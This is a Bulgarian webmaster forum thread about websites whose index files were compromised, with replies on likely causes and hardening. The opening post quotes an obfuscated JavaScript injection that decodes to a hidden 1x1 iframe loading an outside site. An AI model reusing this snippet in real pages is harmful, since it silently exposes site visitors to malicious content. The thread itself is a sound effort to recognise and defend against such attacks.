Какво ново?
От:
Подробно търсене…
SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Хакнати сайтове ???

Kalin4y

Kalin4y

ORM / SEO
Някои да е забелязвал някви простотии по сайтовете си, от сорта на
Код: 
<!-- o65 --><script type="text/javascript">function Decode(){var temp="",i,c=0,out=""; var str="60!105!102!114!97!109!101!32!115!114!99!61!39!104!116!116!112!58!47!47!119!119!119!46!113!109!101!109!115!46!99!111!109!46!109!121!47!116!101!99!104!110!111!108!111!103!121!47!104!116!109!108!47!39!32!119!105!100!116!104!61!39!49!39!32!104!101!105!103!104!116!61!39!49!39!32!115!116!121!108!101!61!39!118!105!115!105!98!105!108!105!116!121!58!32!104!105!100!100!101!110!59!39!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();</script><!-- c65 -->
Гледам сайтове в inbg, superhosting, ns1 и host.bg, дето не съм се логвал от месец на ФТП-то заразени в индекс файла с този код.
Някои да го е срещал ?
 
Re: Хакнати сайтове ???

Какви атаки ? Това сайтче е Owned . Лошо
PS: Добре е да се обърнете към хостинг провайдъра си за това и да потърсите по какъв начин са ви изплющяли(*.log)
 
Последно редактирано:
Re: Хакнати сайтове ???

dhstudio каза:
Какви атаки ? Това сайтче е Owned . Лошо
PS: Добре е да се обърнете към хостинг провайдъра си за това и да потърсите по какъв начин са ви изплющяли(*.log)
Увеличете...

Постоянно има разни ботове, които се опитват по всякакъв начин да проникнат и де променят някой друг index, затова трябва да се взимат мерки за да се предотврати това.
 
Re: Хакнати сайтове ???

Включени allow_url_include и allow_url_fopen са много вероятни причини за възможност за deface. В комбинация със слаба обработка на параметри са си доста опасни.

Би трябвало да можеш да провериш дали са включени при теб с ini_get(); това всичкото се отнася за PHP разбира се.
 
Re: Хакнати сайтове ???

Това нещо с промяна на паролата за ftp-то не се оправя. Атаката е от самия сървър
 
Re: Хакнати сайтове ???

kuzmanin каза:
Това нещо с промяна на паролата за ftp-то не се оправя. Атаката е от самия сървър
Увеличете...
Провери си правата за достъп до файловете. Виж дали другите потребиотели имат право да пишат в твоите директории. Ако е така го оправи. Провери твоят фтп клиент с какви права качва файловете. Случвало ми се е от калпав фтп клиент да ги качва с права 0666. Ако ползваш някаква темплейтна система или кеш оптимизатор, провери папката и файловете с кеша с какви права на достъп са. Често 'за по-лесно' им се дават права за писане от всички потребители и е лесен начин да се подменят файлове.
Както казаха и по-горе може да е от нефилтрирани данни, които получаваш от форма/заявка.

Поздрави.
 
Re: Хакнати сайтове ???

Офф и аз съм пропищял, на мене ми бяха сменили темплейт линка към някакъв пиллс сайт. Съвсем случайно го открих като гледах Outgoing линковете и последния беше този. СИгурно е стоял там от месеци...
 
Re: Хакнати сайтове ???

dhstudio каза:
gvv ако смяташ, че с това ще успееш да се защитиш Успех :), но да прав си това е -0.91919191% от всичко.
Увеличете...
Доста страдах и продължавам да страдам от точно подобни атаки на различни сайтове (лирика: всички са на хост.бг).
Ясно е, че аз не съм единичен случай.
Най-срещано обяснение на този тип атака е брут форс. Ей така ти прогонват паролата по всевъзможни комбинации.
 
Re: Хакнати сайтове ???

Няма значение на кой хостинг сте, а и паролата няма никакво значение, това не става чрез парола.
 
Re: Хакнати сайтове ???

mvmrik каза:
Няма значение на кой хостинг сте, а и паролата няма никакво значение, това не става чрез парола.
Увеличете...

true.. най-4есто дифейс и експолоитс. паролата няма зна4ка. Единственото което има значение е че апачи има права да прави всичко. Защо да брутфорсваш когато имаш апачи с права за всичко ?!? т.е. остава ти да намериш експлоит в скрипта, и от там си ти. WP, Joomla ... всичко опен сорсе програми - напишете им името в Г и довавете exploit или deface...

Когато не намериш подобни или програмата е къстъм писана - почваш да тестваш да счупиш кода вкарвайки някакви простотии в УРЛто... най често кавички и слашове...

за такива дреболии не е виновен хоста. Мое мнение.
 
Re: Хакнати сайтове ???

gvv каза:
Най-срещано обяснение на този тип атака е брут форс. Ей така ти прогонват паролата по всевъзможни комбинации.
Увеличете...
тоя който ти е казал подобна глупост е недоучил математика в гимназията. Само от латинската азбука с малки букви и дължина на паролата 5 знака е 5^26 комбинации(над 20 цифрена е бройката). Верно има разни идиоти дето все още пробват речници на root парола ама тва е по скоро диверсия.

Непроверени параметри или грешни права и от там всевъзможни код/SQL инжекции и каквото се сетите.
 
Re: Хакнати сайтове ???

nikoladd каза:
тоя който ти е казал подобна глупост е недоучил математика в гимназията
Увеличете...

Недей така... брутфорса си е реален, но ... не за саито2е с 1,2,3к посещения... за да се смени нещто в индекса. За това вече си има ботове :) които чекват за експлоити и вузможни инжекции.

За далеч по-дебели неща иде реч с брутфорса... и наистина иде реч... прав си за математиката, и за това имам хора с 4ЦПУ машини с 1Гигават захранване, да смята само... ко повече да кажа...
 
Re: Хакнати сайтове ???

bedio каза:
Недей така... брутфорса си е реален, но ... не за саито2е с 1,2,3к посещения... за да се смени нещто в индекса. За това вече си има ботове :) които чекват за експлоити и вузможни инжекции.

За далеч по-дебели неща иде реч с брутфорса... и наистина иде реч... прав си за математиката, и за това имам хора с 4ЦПУ машини с 1Гигават захранване, да смята само... ко повече да кажа...
Увеличете...
ако ще и в наса да си SSH и FTP сървърите имат по 1-5 секунди забавяне за повторни заявки при неуспешна идентификация. Сам можеш да си сметнеш колко им дреме за 4-те ти CPU-та ;) и бързите ти връзки. Тия неща които ги приказваш стават само за слаби пароли на zip архиви. При 1 секунда закъснение (което е твърде малко) за 5 буквена парола с брутфорс ще ти трябват средно 67 дни в изчакване между самите опити :) а това е невероятно прост случай, при по нормалните скача от десетилетия нагоре. Брутфорс работи само ако паролата ти е "britney" или нещо подобно. Всяка транслитерирана българска дума с 7 или повече знака си е чудесна парола например razbirach,metalotyrsach,bubolechka и т.н. с брутфорс тия ще ги хванеш на куково лято. Ако прибавим и тъй популярните напоследък цифри - 3ybolekar, kre4etalo и малко големи букви 6MekerIya и стават непробиваеми за брутфорс.

Който не се е усетил, че съм обърнал основата и степенния показател в предния пост също не би трябвало да си губи времето с брутфорс ;)

В интерес на истината на мен някви таганайци от далечния изток успяха да ми бутнат един сървър с брутфорс ... веднъж ... препълни се /var/ партишъна с акцес лога ;) голям майтап беше ....
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе